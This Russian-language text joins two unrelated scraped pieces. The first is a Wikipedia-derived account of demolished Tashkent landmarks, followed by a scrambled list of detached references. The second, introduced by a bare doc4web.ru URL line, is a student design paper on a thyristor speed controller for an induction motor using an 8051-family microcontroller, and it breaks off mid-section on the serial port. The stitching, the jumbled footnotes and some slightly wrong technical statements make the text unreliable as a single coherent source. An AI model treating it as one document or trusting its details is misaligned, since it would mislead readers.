Здание общественного собрания - здание [24] было построено в 1909 году по проекту архитектора Маркевича. Первоначально это был дом хлопкозаводчика Вадьяева[25], а с 1910 года Общественное собрание, с 1917 года - это Дом свободы - в нём проходят многочисленные собрания и митинги политических партий и революционной общественности города. С 1930-х прошлого века - это кинотеатр 30 лет ВЛКСМ. В конце прошлого века была предпринята попытка реконструкции и реставрации здания, но в конце концов здание было снесено.
Здание Общества Взаимного кредитования на Ирджарской улице (в советское время - улица Кирова) представляло собой типичный образец ташкентской архитекторы. Многие улицы в центре русского Ташкента были застроены подобными по архитекторному решению зданиями из сырцового кирпича. После катастрофического Ташкентского землетрясения 1966 года это и многие подобные здания были сильно разрушены и впоследствии снесены.
Старое здание ташкентского почтамта, располагавшееся на улице Пушкинской. В конце 70-х годов прошлого (XX) века это здание было снесено при реконструкции города.
Старое здание ташкентского железнодорожного вокзала, построенное в 1899 году по проекту архитектора Г. М. Сваричевского. После сильного землетрясения 1902 года это здание было отремонтировано в 1905 году, и над центральным подъездом вокзала были установлены большие городские часы, первые в Ташкенте. В 1957 году это здание было снесено[26], и на его месте было построено[27] новое современное здание[28] железнодорожного вокзала[29].
Здание Синагоги[30] - располагалось на улице «Двенадцати тополей»[31] Синагога была закрыта в тридцатые годы[32] прошлого (XX) века, позднее в здании располагалась артель «Художник Узбекистана», переросшая впоследствии в фабрику «Сувенир». После землетрясения 1966 года здание было снесено.
Обу́ховский сквер - сквер в Ташкенте на Кашгарке, находившийся на пересечении улицы Лахути (ранее улица Обуха) и улицы Ленина (между улицей Демьяна Бедного и улицей Ленина, а также и на другой стороне улицы Ленина). В сквере до 1918 года находилась братская могила воинов, погибших при неудачном штурме Ташкента в октябре 1864 года. После землетрясения 1966 года весь этот район города был перестроен, Обуховский сквер не сохранился, но сохранилось несколько акаций, росших в Обуховском сквере. В настоящее время в этом месте пролегает улица А.Навои.
Памятник «Защитнику южных рубежей», переименованный в 1992 году в «Памятник защитнику Родины», был установлен в 1973 году перед зданием «Музея истории ТуркВО» (позднее, после 1992 года получившего название «Музей Вооруженных Сил»). Шестиметровый памятник был выполнен из листовой меди техникой выколки скульптором В. Артамоновым, архитекторы Л. Адамов, А. Афанасьев и А. Морозов. 22 ноября 2009 года памятник был демонтирован[33]. 12 январz 2010 года на этом месте была установлена скульптурная композиция, получившая название «Клятва Родине».
Список литературы:
Современный вид здания на бывшей Иканской улице.
ФромУз. Старый Ташкент
Вид внутренних интерьеров дворца князя Н.К.Романова
Здание аптеки Каплана
О зданиях вокруг Сквера. ФромУз, "Старый Ташкент", сообщение № 3766 от 21 мая 2007 г.
Дореволюционный вид Дома Вадьяева (Первый Ташкентский Совет) и современный вид здания (детская библиотека).
Первоначальный и современный виды здания Казенной (Пробирной) палаты на сайте ФромУз (Форум эмигрантов Узбекистана)
Форум эмигрантов Узбекистана. Сообщение № 3587 от 7 мая 2007
Форум эмигрантов Узбекистана. Сообщение № 3616 от 9 мая 2007
В настоящее время это город Ольштын в Польше.
Усто - в переводе на русский язык означает "Мастер".
О усто Ширине Мурадове
Фотография места, на котором позже были установлены ташкентские куранты, а также современный, на лето 2009 года, вид ташкентских курантов
Пассаж Яушевых. Дореволюционный вид и современный вид здания.
Форум Эмигрантов Узбекистана. "Старый Ташкент", сообщение №1774 от 5 октября 2006. Про братьев Яушевых.
Дореволюционная и современная фотографии здания на "Форуме эмигрантов Узбекистана", тема старый Ташкент", сообщение № 1820 от 8 октября 2006
Евангелистско-лютеранская церковь - небольшое, но очень красивое здание в центре Ташкента
Перед завершением строительства А.В.Щусев писал: "В основу композиции здания положены принципы классической архитектуры с учетом климатических и национальных особенностей".
В связи с этим, долгое время площадь, которая получила название "Театральная площадь", а позднее (с 1990 года) "площадь имени Алишера Навои" в народе называлась "Воскресенская".
Ташкентский военный собор
В настоящее время носит название улица Саильгох.
Фотографии здания учительской семинарии и сохранившегося здания церкви при ней. Форум "ФромУз", тема "Старый Ташкент".
Ташкентский сквер меняет облик
Здание общественного собрания
Про Вадьяева
Ташкентский железнодорожный вокзал. История Ташкентского железнодорожного вокзала
[1]: Это новое здание вокзала частично вобрало в себя некоторые элементы здания старого вокзала. В здании нового вокзала имелись внутренние открытые летние дворики, выполненнные в восточном стиле. Интерьер этих двориков представлял собой бывший фасад здания вокзала архитектора Г. Сваричевского.
[2]: Новое здание ташкентского вокзала в стиле бетон - стекло было построено по проекту архитекторов В. Бирюкова, Л. Травянко и В. Русанова.
Старый Ташкент — Форум Эмигрантов Узбекистана
В своей книге «Ташкентъ въ прошломъ и настоящемъ. Историческій очеркъ» А. И. Добросмысловъ пишет: «Синагоги. Синагога русскихъ евреевъ находится въ переулке «12 тополей». Въ начале семидесятыхъ годовъ еврейское общество купило домъ на имя частнаго лица, въ которомъ и совершалось б-гослуженiе. Въ скоромъ времени по открыли молитвеннаго дома вышли крупный недоразуменiя между еврейскимъ обществомъ и солдатами евреями (1876 г.), вследствiе чего администрацiей на некоторое время онъ былъ закрытъ. Въ девятидесятыхъ годахъ еврейское общество исходатайствовало разрешенiе на открытiе синагоги, которая и построена на месте молитвеннаго дома въ 1896 году. Стоимость зданiя синагоги простирается до 25000 р. Зданiе синагоги построено по проекту и подъ наблюденiемъ сапера А. А. Бурмейстера. Общественная синагога туземныхъ евреевъ находится на Чимкентской улице. Построена въ 1896 году на собранные среди единоверцевъ 16000 рублей.
Частная синагога Юсуфъ-Давыдова, построенная въ 1890 г., находится на Давыдовской улице, освещается электричествомъ.
Въ туземномъ городе имеется одинъ еврейскiй молитвенный домъ, появленiе котораго теряется въ глубокой древности.»
Форум эмигрантов Узбекистана. Тема «Старый Ташкент». Сообщение № 3485 от 20 апреля 2007 года. О здании Синагоги на улице «12 тополей» в Ташкенте.
«движимое и недвижимое имущество еврейской религиозной общины было в 1919 г. конфисковано и частично использовано для создания еврейского рабочего дома имени К. Маркса.»
Агентство «Фергана.Ру». «Узбекистан: В Ташкенте демонтирован монумент Защитнику Родины»
Источник: http://ru.wikipedia.org/wiki/Архитектурные_и_ландшафтные_достопримечательности_Ташкента |
https://doc4web.ru/informatika/variator-skorosti-vrascheniya-asinhronnogo-dvigatelya.html | Вариатор скорости вращения асинхронного двигателя | https://doc4web.ru/uploads/files/207/ca59c5745c76cf4ee6ec3c4bdcf6f742.docx | files/ca59c5745c76cf4ee6ec3c4bdcf6f742.docx | СОДЕРЖАНИЕ
ОПРЕДЕЛЕНИЯ, обозначениЯ И СОКРАЩЕНИЯ
ВВЕДЕНИЕ
ОСНОВНАЯ ЧАСТЬ
1 Регулирование скорости вращения асинхронных двигателей
2 Разработка структурной схемы
3 Выбор элементной базы
3.1 Выбор двигателя
3.2 Выбор и описание микроконтроллера
3.3 Выбор датчика скорости
3.4 Выбор датчика температуры
3.5 Выбор АЦП
3.6 Выбор ЦАП
3.7 Выбор остальных элементов
4 Разработка функциональной схемы
5 Разработка алгоритма работы и программы
ЗАКЛЮЧЕНИЕ
СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ
ОПРЕДЕЛЕНИЯ, обозначениЯ И СОКРАЩЕНИЯ
Асинхронный электродвигатель (АД) – электрическая асинхронная машина для преобразования электрической энергии в механическую, работающая по следующему принципу: вращающееся магнитное поле, возникающее при прохождении трёхфазного переменного тока по обмоткам статора, взаимодействует с током, индуктированным полем статора в обмотках ротора, в результате чего возникают механические усилия, заставляющие ротор вращаться в сторону вращения магнитного поля при условии, что частота вращения ротора меньше частоты вращения поля.
Однокристальный микроконтроллер (ОМК) – микро-ЭВМ, включающая в себя все устройства, необходимые для реализации цифровой системы управления минимальной конфигурации.
ДС – датчик скорости
ДТ – датчик температуры
АЦП – аналого-цифровой преобразователь
ЦАП – цифро-аналоговый преобразователь
Г – генератор
ССУ – схема синхронизации и управления
УР – управление режимом
СС и У – сигналы синхронизации и управления
ОЗУ – оперативное запоминающее устройство
ПЗУ – постоянное запоминающее устройство
МП – микропроцессор
РПЗУ/ППЗУ – репрограммируемое ПЗУ или программируемое ПЗУ
СА – системный адаптер
Т/С – таймер/счетчик
БОП – блок обработки прерываний
ПарПП – параллельные порты ввода/вывода
ПосПП – последовательные порты ввода/вывода
БАВВ – блок аналового ввода/вывода
ИС – интегральная схема
СК – счетчик команд
вВЕДЕНИЕ
Всегда существовала потребность в регулировании скорости двигателей, чтобы оптимально управлять технологическим процессом. Раньше это делалось механически, например, с помощью механического вариатора. Благодаря большим преимуществам электроники возможны более универсальные приложения и общие понятия современного привода. Раньше для решения задачи регулирования скорости использовались только приводы постоянного тока. Теперь асинхронные приводы становятся все более популярными с каждым днем. Они состоят из вариатора скорости и асинхронного двигателя. Причины этого развития следующие:
• асинхронные машины нетребовательны к техобслуживанию;
• возможно эксплуатирование во взрывоопасной зоне;
• высокий коэффициент мощность/масса для асинхронного двигателя;
• возможность управления при максимальной скорости;
• низкая стоимость асинхронных двигателей.
Основные сферы применения регуляторов скорости следующие:
• насосы, вентиляторы, компрессоры;
• конвейер и транспортное оборудование;
• текстильные машины;
• механические станки и деревообрабатывающие машины;
• упаковочные машины;
• роботы и транспортные системы;
• оборудование для бумажной промышленности.
В промышленности наибольшее распространение получили трехфазные асинхронные двигатели с короткозамкнутым ротором, имеющие трехфазную обмотку на статоре и питающиеся от трехфазной сети.
В данном проекте рассматривается возможность регулирования действующего значения напряжения нагрузки в цепи переменного тока с помощью тиристорного регулятора, состоящего из двух встречно-параллельных тиристоров, включенных последовательно с нагрузкой. В этом случае пара тиристоров регулирует напряжение, подведенное к фазе статора, и фазное напряжение представляет собой отрезки синусоид. Если управляющие импульсы подаются в начале положительных полупериодов анодных напряжений, то тиристоры открываются без запаздывания. При этом тиристорные пары фактически оказываются закороченными, и к статорным обмоткам прикладывается полное напряжение сети. При увеличении угла запаздывания интервал проводимости тиристоров уменьшается, поэтому действующее значение напряжения на нагрузке снижается. При угле запаздывания, равном 180°, тиристоры полностью запираются, вследствие чего напряжения и токи двигателя равны нулю. Такое использование тиристорных ключей как последовательно включенных нелинейных сопротивлений характеризуется тем достоинством, что в самом регуляторе выделяется значительно меньшая мощность, чем в нагрузке.
ОСНОВНАЯ ЧАСТЬ
1 Регулирование скорости вращения асинхронных двигателей
Большинство двигателей переменного тока вращается с угловой скоростью, которая определяется в первую очередь частотой питающего напряжения. Угловая скорость синхронных двигателей зависит только от частоты питания, а для асинхронных двигателей она несколько ниже синхронной угловой скорости. При постоянной частоте сети для заданного скольжения развиваемый асинхронным двигателем момент пропорционален квадрату напряжения питания. Так как установившийся режим работы наступает при равенстве моментов двигателя и нагрузки, то скольжение ротора зависит от момента нагрузки и напряжения питания. Поэтому регулировать угловую скорость можно плавным изменением напряжения при неизменной его частоте.
По мере снижения напряжения статора угловая частота ротора уменьшается, однако при этом снижается максимальный момент двигателя, поэтому при постоянном моменте нагрузки диапазон регулирования скорости ограничен. В двигателях с повышенным активным сопротивлением ротора диапазон регулирования увеличивается (рис. 1), однако потери в роторе при этом растут и КПД двигателя снижается, особенно при пониженных частотах вращения. Ухудшение режима работы двигателя объясняется тем, что при заданном скольжении ток двигателя пропорционален напряжению питания, а электромагнитный момент зависит от квадрата этого напряжения. Поэтому по мере снижения скорости отношение момента к току падает, и для получения сравнительно небольших моментов при низких скоростях требуются значительные токи.
Однако в электроприводах вентиляторов и насосов момент нагрузки изменяется примерно пропорционально квадрату угловой скорости. Следовательно, момент, требующийся при пуске и небольших угловых скоростях, мал и может быть получен без чрезмерного выделения тепла регулированием напряжения питания обычных асинхронных двигателей с номинальным скольжением, равным примерно 10% (рис. 2).
Снижение напряжения статора достигается путем включения регулируемых внешних сопротивлений между выводами статора и фазами сети. Раньше для этих целей использовались дроссели насыщения, а в настоящее время их вытеснили тиристорные устройства, которые имеют существенные преимущества при сравнимой стоимости. Несмотря на наличие охладителей, тиристорные устройства являются более компактными и имеют значительно меньшую массу. Они характеризуются также более высоким КПД и быстродействием, которое составляет всего половину периода сети, в то время как для дросселей насыщения оно равно примерно 0,1с и больше. Кроме того, тиристорные устройства, выпущенные различными изготовителями, являются взаимозаменяемыми, в то время как характеристики различных дросселей насыщения сильно отличаются друг от друга. Основная схема включения тиристоров в регуляторах переменного тока состоит из двух тиристоров, соединенных встречно-параллельно и управляемых симметрично, т. е. в одинаковые моменты каждого полупериода.
При включении таких узлов в цепи статора и регулировании интервалов проводимости тиристоров можно изменять действующее значение приложенного к двигателю напряжения от нуля до номинального. При этом двигатели питаются напряжением прерывистой формы, а их токи содержат значительные гармоники, однако для малой и средней мощности, примерно до 75 кВт, режимы работы двигателей оказываются приемлемыми. Устройства для регулирования напряжения статора значительно проще и дешевле описанных ранее схем преобразователей частоты. Однако КПД асинхронных электроприводов с регуляторами напряжения невысок, поэтому приходится завышать габариты двигателей во избежание превышения их температуры из-за увеличения тока и ухудшения вентиляции. Тиристорные регуляторы напряжения широко используются для электроприводов малой мощности и приводов кранов и лебедок, где большие моменты при низких частотах вращения требуются лишь в течение небольшой части рабочего цикла.
2 Разработка структурной схемы
Структурная схема замкнутой системы строится следующим образом. Электропривод с асинхронным двигателем управляется от тиристорного регулятора. С целью контроля температуры корпуса двигателя будет использоваться датчик температуры. Для получения информации о скорости вращения вала двигателя будет использоваться тахогенератор, вал которого жестко сопряжен с осью рабочего двигателя. Сигналы с датчиков поступают на блок управления, который подает управляющие сигналы на тиристорный регулятор скорости.
3 Выбор элементной базы
3.1 Выбор двигателя
В качестве объекта регулирования будем рассматривать трехфазный асинхронный двигатель с короткозамкнутым ротором общепромышленного назначения. Как уже было сказано выше, выбранный способ регулирования скорости вращения двигателя широко используется в устройствах малой мощности при сравнительно небольших частотах вращения. Поэтому выберем асинхронный двигатель закрытого исполнения с короткозамкнутым ротором типа АИР180М2 со следующими характеристиками:
- номинальная мощность 30 кВт;
- номинальная частота вращения 2935 об/мин;
- КПД 91%;
- коэффициент мощности 0.89;
- номинальный ток (380 В) 56.1 А;
- номинальный момент 98 Нм;
- отношение пускового момента к номинальному 2.3;
- масса 180 кг.
Двигатель выполнен в закрытом исполнении (рис. 4). Сердечники статора и ротора изготавливаются из штампованных листов высококачественной электротехнической стали, легированной кремнием. Сталь имеет термостойкое электроизоляционное покрытие. Обмотки статора двигателя выполняются всыпными из круглого эмалированного медного провода. Обмотки ротора выполняются короткозамкнутыми литыми из чистого алюминия. Превышение температуры обмоток статора над температурой окружающей среды должно составлять не более 83 оС.
3.2 Выбор и описание микроконтроллера
В настоящее время среди всех 8-разрядных микроконтроллеров семейство MCS-51 является несомненным чемпионом по количеству разновидностей и количеству компаний, выпускающих его модификации. Оно получило свое название от первого представителя этого семейства – микроконтроллера 8051, выпущенного в 1980 году на базе технологии HMOS. Удачный набор периферийных устройств, возможность гибкого выбора внешней или внутренней программной памяти и приемлемая цена обеспечили этому микроконтроллеру успех на рынке.
Важную роль в достижении такой высокой популярности семейства 8051 сыграла открытая политика фирмы Intel, родоначальницы архитектуры, направленная на широкое распространение лицензий на ядро 8051 среди большого количества ведущих полупроводниковых компаний мира.
В результате на сегодняшний день существует более 200 модификаций микроконтроллеров семейства 8051, выпускаемых почти 20-ю компаниями. Эти модификации включают в себя кристаллы с широчайшим спектром периферии: от простых 20-выводных устройств с одним таймером и 1К программной памяти до сложнейших 100-выводных кристаллов с 10-разрядными АЦП, массивами таймеров-счетчиков, аппаратными 16-разрядными умножителями и 64К программной памяти на кристалле. Каждый год появляются все новые варианты представителей этого семейства. Основными направлениями развития являются: увеличение быстродействия (повышение тактовой частоты и переработка архитектуры), снижение напряжения питания и потребления, увеличение объема ОЗУ и FLASH памяти на кристалле с возможностью внутрисхемного программирования и т.п. Основными производителями МК 51-го семейства в мире являются фирмы Phillips, Siemens, Intel, Atmel, Dallas, AMD, MHS, Gold Star и ряд других.
Для данной задачи микроконтроллер этого семейства является оптимальным, т.к. сочетает в себе большие возможности управления, необходимые для решения поставленной нами задачи. А также при серийном выпуске данного изделия большую роль будет играть его малая стоимость, высокую надежность работы. Итак, с учетом вышесказанного, будем использовать МК КР1816ВЕ51.
ОМК представляет собой СБИС, состоящую из:
8-разрядного МП;
2-х 16-ти разрядных счетчиков;
4-х 8-ми разрядных параллельных портов ввода/вывода, каждый бит которых можно настроить на ввод или вывод;
последовательного порта;
подсистемы прерываний;
резидентного ОЗУ (128х8);
резидентного ПЗУ (или РПЗУ с ультрафиолетовым стиранием информации) 4Кх8;
напряжение питания 5В;
ток потребления 18 мА (КМОП-технология), 150-200 мА (n-МОП-технология);
максимальная тактовая частота 12МГц, что обеспечивает время выполнения основных команд за 1 – 2 мкс, только умножение и деление выполняется за 4 мкс.
Архитектура МП реализует гарвардский принцип организации. Особенностью этой архитектуры является разделение общей памяти на память команд и память данных, при этом в ОМК используют раздельные команды для обращения к памяти и данным. Длина команды в машине фон Неймана (принстонская организация) получается больше, т.к. используются общие способы адресации для команд и для данных. В то же время, число необходимых способов адресации для команд значительно меньше, чем для данных. Применение раздельных команд существенно уменьшает длину каждой команды (при прочих равных условиях). Разделение памяти программ и данных при наличии двух независимых магистралей для обращения к ПЗУ программ и ОЗУ данных существенно упрощает организацию конвейерной обработки: после выборки очередной команды возможно одновременное обращение к ПЗУ за следующей командой и выборка данных из ОЗУ. В ОМК ВЕ51 раздельные магистрали не реализованы.
Форматы данных:
данные с фиксированной запятой;
двоичные;
двоично-десятичные.
Формы представления данных:
числовые;
логические;
битовые.
Длина формата:
16 бит;
8 бит;
1 бит.
Форматы команд:
одноадресные;
двухадресные;
безадресные.
Способы адресации:
Резидентная память данных:
прямая;
прямая регистровая;
косвенная;
стековая.
Непосредственная внешняя память данных:
косвенная;
странично-косвенная.
Память команд:
косвенная;
индексная;
относительная.
Память данных представляет собой два независимых адресных пространства – резидентную память данных (РПД) и внешнюю память данных (ВПД), отличающиеся местом расположения и средствами доступа к данным.
РПД представляет собой единое адресное пространство. К каждой ячейке можно обратиться, используя прямую и косвенную адресацию. При прямой адресации в формате команды указывается непосредственный адрес ячейки; косвенная - реализуется через регистры R0, R1 каждого банка РОНов. РПД разделена на 3 зоны, каждая из которых имеет свои функциональные особенности:
Зона блоков РОНов – состоит из 4-х банков. По сбросу активным является 0-ой банк. Номер банка устанавливается в слове состояния процессора. Достоинством этой зоны является возможность использования прямой регистровой адресации. Команды работы с регистрами 1 – байтовые, реализуются за 1 мкс;
Свободная зона - особенностей по способам адресации не имеет.
Зона РСФ - содержит основные регистры данных и управления:
А – аккумулятор;
В – расширитель А;
PSW – слово состояния МП;
SP – указатель стека;
SBUF – регистр данных последовательного порта;
ТМОD – регистр управления таймером и т.д. Обращение к РСФ возможно только с указанием прямого адреса. В ВЕ 51 используется только часть адресов зоны РСФ. Неиспользованные адреса зарезервированы для развития ОМК данной серии.
Битовая зона – особенности:
возможность обращения к каждому биту этой зоны с помощью команд обработки бит;
адресное пространство битовой зоны и РПД не пересекаются. Обращение к битам возможно только с использованием команд прямой адресации;
битовое пространство начинается в битовой зоне РПД (адреса 20h-2Fh), а заканчивается в зоне регистров спец. функций (РСФ).
Таким образом, обращение к РПД по адресу 0Еh возможно: с использованием прямой адресации, косвенной, указав в регистре R0 или R1 любого банка этот адрес, прямой регистровой адресации, обращаясь к регистру R6 первого банка. Номер банка следует предварительно установить в PSW. Обращение к РПД по адресу 20h возможно по прямому или косвенному адресу. Одновременно возможна обработка любого бита этой ячейки с использованием битовых команд. Адрес бита можно указать в виде 20.х, где х – номер бита или n, где n – прямой адрес битового пространства. Подобные возможности позволяют минимизировать как длину кода программ, так и время их выполнения.
Пространство резидентной памяти команд (РПК) и внешней памяти едино. Обращение к внешнему ПЗУ осуществляется автоматически, если адрес больше чем 4К. Предусмотрена возможность отключения РПК подачей уровня логического 0 на вход EA/VPP.Этот режим обычно используется при отладке программного обеспечения.
Система команд.
1. Команды пересылки
Команды этой группы не модифицируют признаки результата за исключением команды загрузки PSW и пересылок, в которых приемником результата является аккумулятор А. В этом случае устанавливается бит паритета и аппаратно формируется признак равенства 0 – Z=1, который можно использовать для выполнения команд условного перехода JZ (JNZ).
2. Команды обращения к ВПД
Обращение к ВПК и ВПД осуществляется через регистр - указатель DPTR. Обращение к регистру возможно с помощью команды MOV DPTR,#d16, старший (DPH) и младший (DPL) байты этого регистра доступны через зону РСФ.
3. Арифметические операции
Команды выполняют операции сложения, вычитания, инкремента, декремента и др. При умножении старший байт результата записывается в регистр-расширитель В, а младший – в А. Если содержимое А>256, то формируется флаг арифметического переполнения OV. Бит С всегда сбрасывается. При делении частное записывается в А, а остаток – в В. Флаги переноса C и арифметического переполнения OV сбрасываются. Если (А)<(В), то флаг дополнительного переноса (АС) не сбрасывается. При делении на 0 устанавливается флаг OV.
4. Логические команды
Эти команды позволяют реализовать логические операции «и», «или», «исключающее или», а также ряд операций над содержимым аккумулятора.
5. Битовые команды
При выполнении битовых команд бит С выполняет функции аккумулятора. При работе с битами используется только прямая адресация.
Команды передачи управления
К этой группе команд относятся команды условного и безусловного переходов, вызова подпрограмм и возврата из них, а также команда пустой операции NOP.
Параллельные порты.
Порты Р0-Р3 предназначены для ввода или вывода байтовой информации и обеспечивают обмен с внешними устройствами: памятью программ и данных, контроллерами различного назначения, периферийными устройствами. Каждый из портов состоит из 8-разрядного регистра -защелки (РЗ), выходного драйвера транзистора Т1, входных цепей и схемы Д1 с открытым коллектором. Схемотехника портов несколько отличается, так как они выполняют разные функции. Однако в упрощенном варианте её можно рассмотреть на рис. 7.
При чтении со входа порта Рх.Y данные через конъюнктор Д1 передаются на внутреннюю шину данных (ВШД), которая организована как "монтажное ИЛИ". Если в РЗ записана 1, то данные со входа порта без искажения передаются в приемник. Если РЗ=0, то в соответствующий разряд приемника будет записан 0 в независимости от значения сигнала. При записи информации в порт, данные записываются в РЗ и выводятся через Т1 на выход порта. Обращение к портам возможно только по прямому адресу. Все разряды порта находятся в битовом пространстве. Порты однонаправленные. Каждый бит порта может быть настроен как на ввод, так и на вывод. По сбросу все порты устанавливаются на ввод. Для чтения данных из порта или регистра защелки используются различные команды. Чтение РЗ осуществляется командами «чтение-модификация-запись», при выполнении которых команда считывает состояние РЗ, при необходимости модифицирует полученное значение и записывает результат обратно в РЗ. Во всех случаях, когда операндом и регистром назначения является порт или бит порта, команды считывают информацию с выходов РЗ, а не с внешних контактов выводов порта.
Порты Р0, Р1, Р2, Р3 в зависимости от особенности применения могут реализовать разные функции. При работе с внешней памятью порт Р0 является системным портом, через который в режиме с разделением времени передаются младший байт адреса и данные. Появление младшего байта адреса сопровождается сигналом ALE, по которому он должен быть зафиксирован во внешнем регистре. Признаком работы Р0 в системном режиме является использование команд MOVX, MOVC. При работе в качестве системного порта согласование (специальное) с нагрузкой не требуется. Если Р0 используется как порт общего назначения, то к выходу порта должен быть присоединен внешний подтягивающий резистор от источника питания +5В. Р1-Р3 имеют встроенную нагрузку. Порт Р2 служит для вывода старшего байта адреса при работе в системном режиме. Особенностью порта Р2 является возможность мультиплексирования на выход содержимого РЗ или старшего байта адреса. При работе в режиме адресной шины содержимое РЗ сохраняется и поступает на выводы порта в тех машинных циклах, когда нет обращения к внешней памяти. При обращении к внешней памяти на выход порта выводится информация из регистра адреса DPTR или из программного счетчика РС по командам MOVC и MOVX. Исключение составляют команды MOVX A,@Ri, и MOVX @Ri,A, при которых на выходе находится содержимое регистра-защелки. Нагрузочная способность Р0 - два входа ТТЛ, у остальных - один. Р1 - порт общего назначения и особенностей не имеет. Р3 - при записи в Р3 “1” выполняет системные функции.
Счетчик/Таймер.
Счетчик-таймер предназначен для обработки внешних и внутренних событий, формирования программно-управляемых временных задержек, выполнения времязадающих функций. В состав ОМК входят два 16 разрядных суммирующих СТ. Счетчик состоит из регистров счетчика TL (младший байт), TH (старший байт), логики управления входными сигналами и триггера переполнения TF. Бит TF устанавливается при переходе счетчика из состояния все “1” во все “0”. Бит TF располагается в битовом пространстве и доступен по прямому адресу. Обращение к TLi, THi производится раздельно по прямым адресам.
Управление работой счетчика выполняется с помощью регистра режима работы TMOD и регистра управления статуса TCON .
GATE1, GATE0 - управление блокировкой (при GATEi=1 работа счетчика/таймера разрешается, если INT=1 и TRi=1; если GATEi=0, то работа счетчика зависит только от состояния TRi; (i=1,0); С/Т1, С/Т0 - выбор режима работы (при С/Т=1 - работа в режиме счетчика от внешних сигналов на входе Ti; при С/Т=0 - работа в режиме таймера от внутреннего источника сигналов синхронизации); М1, М0 - задание основных режимов работы.
В режиме таймера счетчик работает от внутреннего генератора с частотой OSC/12. При работе в режиме счетчика содержимое T/C инкрементируется под воздействием перехода из 1 в 0 внешнего сигнала, подаваемого на соответствующие входы Т0, Т1 порта Р3. Инкремент выполняется после анализа состояния “0” или ”1” на входе Тi, поэтому накладываются определенные ограничения на параметры преобразуемого сигнала: уровень 0 и 1 должен продолжаться не менее OSC/12. Максимальная преобразуемая внешняя частота - OSC/24. Способ запуска СТ устанавливается битом GATE: если GATE =1, то реализуется аппаратный запуск, при котором разрешение счета подается на вход INTi порта Р3 (уровень 1). Предварительно должен быть установлен бит запуска счетчика TRi в регистре TCON. При программном запуске GATE =0, начало счета задается установкой бита TRi =1.
Режим работы каждого СТ определяется значением битов М0, М1 в регистре ТМОD. Счетчики могут быть настроены на один из 4 режимов. Режимы 0,1,2, одинаковы для обоих счетчиков и в этих режимах они полностью независимы. Работа ТС0 и ТС1 в режиме 3 различна. Режим 3 рационально использовать только для СТ0 . При этом установка СТ0 в режим 3 влияет на режим работы СТ1.
Режим 0: Режим 13-ти разрядного счетчика, состоящего из TНi и 5 младших разрядов TLi.
Режим 1: 16-ти разрядный счетчик, состоящий из THi и TLi.
Режим 2: В этом режиме СТ представляет собой 8-разрядный счетчик TLi. При каждом переполнении TLi кроме установки флага TFi происходит автоматическая загрузка содержимого THi в TLi. Требуемый коэффициент деления должен записываться одновременно в THi и TLi. В отличие от режимов 0 и 1 после установки флага переполнения коэффициент деления переписывается автоматически.
Режим 3: В этом режиме счетчик 0 функционирует как 2 независимых счетчика, а счетчик 1 заблокирован и просто сохраняет свой код (выполняет функции регистра). При этом можно настроить счетчик 1 на другие режимы. Режим 3 используется, если необходимо увеличить число действующих счетчиков до 3-х.
При работе в этом режиме ТС0 разделяется на два 8-ми разрядных счетчика, сформированных на базе регистров ТН0, ТL0. Счетчик ТН0 управляется битом ТR1 и формирует сигнал переполнения ТF1. Счетчик ТН0 может работать только в режиме таймера. Установка ТС0 в режим 3 лишает ТС1 бита включения TR1. Поэтому ТС1 в режимах 0, 1, 2 при GATE=0 всегда включен и при переполнении в режимах 0 и 1 ТС1 обнуляется, а в режиме 2 перезагружается, не устанавливая флага, если ТС0 находится в режиме 3. ТС1 аппаратно связан с блоком синхронизации последовательного порта. Поэтому в режимах 0,1,2 при переполнении ТС1 всегда вырабатывает импульс синхронизации последовательного порта. Если ТС0 работает в режиме 3, то ТС1 может быть настроен на режим 0,1 или 2, но при этом необходимо учитывать, что в процессе работы не формируется бит переполнения, а режим разрешения счета постоянно включен.
Для настройки счетчика на требуемый режим необходимо:
Задать требуемый коэффициент пересчета в регистры ТНi, ТLi.
Задать режим работы в слове TMOD.
При программном вводе-выводе замаскировать соответствующие прерывания от счетчика, а при использовании прерывания- их разрешить.
Установить бит разрешения ТRi в слове TCON.
На базе СТ можно организовать преобразователи частоты, временного интервала, периода в код, генераторы и формирователи сигналов. Однако необходимо учитывать, что TFi аппаратно недоступен, поэтому выходные сигналы следует формировать на выходах параллельных портов. При измерении частоты методом среднего возможны два варианта формирования эталонного временного интервала Тэт. Аппаратная реализация предполагает подачу измеряемой частоты на вход Ti, а Тэт – на INTi. При программной реализации Тэт формируется на одном из счетчиков, работающем в режиме таймера; второй счетчик подсчитывает число внешних импульсов. Начало работы второго счетчика задается битом TRi первого счетчика, а конец счета - битом TF первого счетчика. Особенностью формирования выходных частотно-временных сигналов является отсутствие электрического выхода СТ. Поэтому сигналы формируются на свободных выходах портов Р0-Р2 в момент установки TRi и TFi.
Последовательный порт.
Последовательный обмен используется при передаче информации на большие расстояния, с целью экономии оборудования. Передача через последовательный порт может быть реализована в режимах синхронного или асинхронного обмена (отличается от синхронного и асинхронного способов передачи информации). При асинхронном режиме формат передаваемого сообщения имеет вид:
Обычно длина символов, бит паритета и стоповые биты задаются программно.
Достоинство такого обмена - повышеная достоверность передаваемой информации.
Недостатки:
пониженное быстродействие, так как на каждый передаваемый символ требуется 3 или 4 бита сопровождения;
информация передается по байтам.
При асинхронном обмене требуется меньшее количество линий между приемником и передатчиком, так как синхронизация обеспечивается заданием одинаковой частоты генераторов ГТИ на приемном и передающем конце линии связи. При синхронном обмене информация передается посимвольно, с необязательным битом паритета. В некоторых случаях начало сообщения, его конец и адрес приемника кодируются специальными символами (символами синхронизации). Скорость синхронного обмена возрастает в 5-10 раз, по сравнению с асинхронным. Однако требуется дополнительная линия, к которой подключен ГТИ (генератор тактовых импульсов), общий для приемника и передатчика.
Последовательный порт ВЕ51 осуществляет прием/передачу информации в последовательном коде, младшими битами вперед в дуплексном режиме (одновременный прием и передача информации) или полудуплексном режимах. В состав последовательного канала входят принимающие и передающие сдвиговые регистры , специальный программно-доступный буфер SBUF, регистр управления SCON и логика управления каналом. Запись байта в передатчик осуществляется автоматически, после того, как информация записана в SBUF. Чтение иформации выполняется из этого же регистра после установки флага готовности последовательного канала RI.
Последовательный канал может работать в следующих четырех режимах:
Режим "0" - cинхронный обмен в полудуплексном режиме с частотой OSC/12. Формат посылки - 8 бит. Данные принимаются и передаются через вход RxD, а частота синхронизации формируется на выходе TxD. В этом режиме порт работает как восьмиразрядный сдвиговый регистр.
